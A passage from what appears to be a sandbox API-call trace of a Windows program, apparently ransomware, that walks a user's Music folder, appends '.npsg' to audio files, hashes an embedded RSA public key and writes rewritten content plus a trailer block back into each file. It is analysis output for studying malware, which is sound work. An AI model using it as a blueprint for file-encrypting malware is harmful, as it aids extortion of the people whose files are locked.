hHeap=0x620000) returned 1 [0236.977] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\eAqsDlP2D0nW.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\eaqsdlp2d0nw.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\eAqsDlP2D0nW.m4a.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\eaqsdlp2d0nw.m4a.npsg")) returned 1 [0236.977] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b81cd0 | out: hHeap=0x620000) returned 1 [0236.977] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0236.977] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.979] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x68a920 | out: hHeap=0x620000) returned 1 [0236.979] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4cda8920, ftCreationTime.dwHighDateTime=0x1d5b610, ftLastAccessTime.dwLowDateTime=0x44b04c50, ftLastAccessTime.dwHighDateTime=0x1d5bcfd, ftLastWriteTime.dwLowDateTime=0x44b04c50, ftLastWriteTime.dwHighDateTime=0x1d5bcfd, nFileSizeHigh=0x0, nFileSizeLow=0xa9a2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kvDGm-aGpcHQ8p2smqpu.m4a", cAlternateFileName="KVDGM-~1.M4A")) returned 1 [0236.979] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0236.979] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a6e8 [0236.979] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c52a8 | out: hHeap=0x620000) returned 1 [0236.979] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kvDGm-aGpcHQ8p2smqpu.m4a") returned=".m4a" [0236.979] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kvDGm-aGpcHQ8p2smqpu.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kvdgm-agpchq8p2smqpu.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0236.980] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=43426) returned 1 [0236.980] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0236.982] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xa97c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.982] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0236.984] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0236.984] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0236.984] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0236.984] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0xa9a2, lpOverlapped=0x0) returned 1 [0236.985] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.985] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0236.985] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.985] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.985] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a440) returned 1 [0236.986] CryptCreateHash (in: hProv=0x67a440, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0236.986] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0236.986] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0236.986] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0236.986] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0236.986] GetLastError () returned 0x0 [0236.986] CryptDestroyHash (hHash=0x33f0408) returned 1 [0236.986] CryptReleaseContext (hProv=0x67a440, dwFlags=0x0) returned 1 [0236.986] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0236.986] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0236.986] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0236.986] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0236.986] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0236.986] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0236.986] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0236.986] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa9a0) returned 0x3b81cd0 [0236.987] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0236.987] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0236.987] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0236.987] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0236.987] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0236.987] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecbc8 [0236.987] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b95ae8 [0236.987] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34003e0 [0236.987] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b95b30 [0236.987] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34003f8 [0236.987] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400428 [0236.987] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400488 [0236.987] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400440 [0236.987] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0236.987] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b8d7c0 [0236.987] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b8d7c0, Size=0x218) returned 0x3b90a38 [0236.987] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x3b8c678 [0236.987] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400428 | out: hHeap=0x620000) returned 1 [0236.987] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400440 | out: hHeap=0x620000) returned 1 [0236.987] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400488 | out: hHeap=0x620000) returned 1 [0236.987] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0236.987] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8c678 | out: hHeap=0x620000) returned 1 [0236.987] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400488 [0236.987] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373548 [0236.988] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400440 [0236.988] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0236.988] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x3400428 [0236.988] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0236.988] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7bb78 [0236.988] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0236.988] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecb68 [0236.988] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0236.988] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7b830 [0236.988] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87c0 [0236.988] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0236.988] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0236.988] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400440 | out: hHeap=0x620000) returned 1 [0236.988] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0236.988] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400428 | out: hHeap=0x620000) returned 1 [0236.988] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0236.988] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0236.988] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400488 | out: hHeap=0x620000) returned 1 [0236.988] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0236.988] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecbc8 | out: hHeap=0x620000) returned 1 [0236.988] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90a38 | out: hHeap=0x620000) returned 1 [0236.988] GetCurrentThreadId () returned 0x5b4 [0236.988] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0236.988] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b79a98 [0236.988] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0236.988] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a440 [0236.988] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x33c2ee8 [0236.988] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0236.988] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0236.988] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0236.988] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.989] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.989] GetCurrentThreadId () returned 0x5b4 [0236.989] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.989] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.989] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x340dd38 [0236.989] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.989] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.989] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.989] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.989] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0236.989] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x340dd38 [0236.989] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0236.989] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c52a8 [0236.989] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0236.989] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0236.989] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0236.989] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400488 [0236.989] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0236.989] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0236.989] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0236.989] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0236.989] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0236.989] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0236.989] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0236.989] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0236.989] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400428 [0236.989] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0236.989] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373538 [0236.989] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0236.989] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0236.989] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0236.989] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0236.990] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0236.990] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400440 [0236.990] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0236.990] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0236.990] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0236.990] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400410 [0236.990] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f928 | out: hHeap=0x620000) returned 1 [0236.990] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34004a0 [0236.990] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0236.990] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0236.990] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0236.990] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400470 [0236.990] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0236.990] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400458 [0236.990] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0236.990] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34004b8 [0236.990] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400458 | out: hHeap=0x620000) returned 1 [0236.990] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400458 [0236.990] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400470 | out: hHeap=0x620000) returned 1 [0236.990] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0236.990] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0236.990] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0236.990] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0236.990] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd4c8 [0236.990] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400428 | out: hHeap=0x620000) returned 1 [0236.990] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400428 [0236.990] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0236.990] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x3b90a38 [0236.990] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400488 | out: hHeap=0x620000) returned 1 [0236.990] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7bb78 [0236.991] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34004b8 | out: hHeap=0x620000) returned 1 [0236.991] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x346fd28 [0236.991] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0236.991] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x3b7b948 [0236.991] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822f0 | out: hHeap=0x620000) returned 1 [0236.991] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7ba60 [0236.991] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400428 | out: hHeap=0x620000) returned 1 [0236.991] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x3b947f8 [0236.991] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0236.991] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x64dd08 [0236.991] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0236.991] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a440 | out: hHeap=0x620000) returned 1 [0236.991] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0236.991] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64dd08 | out: hHeap=0x620000) returned 1 [0236.991] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8800 | out: hHeap=0x620000) returned 1 [0236.991] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0236.991] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fd28 | out: hHeap=0x620000) returned 1 [0236.991] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0236.991] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0236.991] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822e0 | out: hHeap=0x620000) returned 1 [0236.991] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400458 | out: hHeap=0x620000) returned 1 [0236.991] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8f8 | out: hHeap=0x620000) returned 1 [0236.991] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34004a0 | out: hHeap=0x620000) returned 1 [0236.991] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0236.991] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400440 | out: hHeap=0x620000) returned 1 [0236.991] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400410 | out: hHeap=0x620000) returned 1 [0236.991] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0236.992] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c19c8 | out: hHeap=0x620000) returned 1 [0236.992] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0236.992] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34003f8 | out: hHeap=0x620000) returned 1 [0236.992] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b95b30 | out: hHeap=0x620000) returned 1 [0236.992] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90a38 | out: hHeap=0x620000) returned 1 [0236.992] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33adda8 | out: hHeap=0x620000) returned 1 [0236.992] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c52a8 | out: hHeap=0x620000) returned 1 [0236.992] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0236.992] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87a0 | out: hHeap=0x620000) returned 1 [0236.992] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0236.992] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0236.992] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecb68 | out: hHeap=0x620000) returned 1 [0236.992] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7aa18 | out: hHeap=0x620000) returned 1 [0236.992] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0236.992] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0236.992] WriteFile (in: hFile=0x644, lpBuffer=0x3b81cd0*, nNumberOfBytesToWrite=0xa99d, lpNumberOfBytesWritten=0x39afb14, lpOverlapped=0x0 | out: lpBuffer=0x3b81cd0*, lpNumberOfBytesWritten=0x39afb14*=0xa99d, lpOverlapped=0x0) returned 1 [0236.992] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b81cd0 | out: hHeap=0x620000) returned 1 [0236.992] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xa9a2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.992] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0236.992] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0236.993] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7cbd8 [0236.993] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x3b947f8 [0236.993] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", cchWideChar=-1, lpMultiByteStr=0x3b947f8, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", lpUsedDefaultChar=0x0) returned 41 [0236.993] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x3b81cd0 [0236.993] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0236.993] HeapFree (in: hHeap=0x620000, dwFlags=0x0, 